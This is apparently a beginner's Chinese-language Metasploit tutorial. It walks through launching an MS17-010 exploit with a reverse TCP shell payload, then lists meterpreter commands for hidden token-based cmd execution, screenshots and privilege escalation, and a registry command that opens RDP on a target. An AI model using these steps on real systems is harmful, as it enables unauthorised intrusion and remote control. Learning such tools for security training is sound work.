本人太渣，所以写了这个基础篇供一些小白和新手看，大佬们手下留情。

这是个基础篇。。。。。

这几天在培训第一次接触Metasploit，没有我原来想象中那么麻烦，真的上手很方便  嘻嘻嘻嘻~~~~o(*￣▽￣*)o

kali集成了Metasploit，所以我用的我是kali。打开kali终端，输入msfconsole.等待Metasploit加载。成功之后终端前面会变成这样：msf>

以下是命令以及解释：msf>search ms17-010

//查找metasploit框架中的渗透攻击模块。

msf > use  XXX    //装载一个渗透攻击或模块

msf > show payloads

//输出很多可用的攻击载荷

msf > set payload windows/shell_reverse_tcp        //指定想要使用的攻击载荷。反弹型的链接方式，可以绕过防火墙

msf > set RHOST 渗透目标主机的IP地址

msf > set LHOST 本机IP

msf >show targets

输出各种版本的操作系统代号，根据目标操作系统版本选择。

msf >set target XX

msf >show options                    //输出设置清单，可进行修正

msf >exploit  或者  run           //没有错误，即可进行攻击了。

进去之后显示 meterpret

分割线啦啦啦啦~~~~~~

常用命令：

execute -f cmd.exe -i              执行cmd.exe命令并进行交互。

execute -f cmd.exe -i -t           以所有可用令牌来执行cmd命令。

execute -f cmd.exe -i -H -t      以所有可用令牌来执行cmd命令并隐藏该进程。

screenshot                              对目标主机的屏幕进行截图。

use priv                                   加载特权提升扩展模块，来扩展meterpreter库。

开启3389端口命令：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
我实例多次，对Windows XP 和2003系统有用的，不用重起，只要对方是外网，行后方可连接3389终端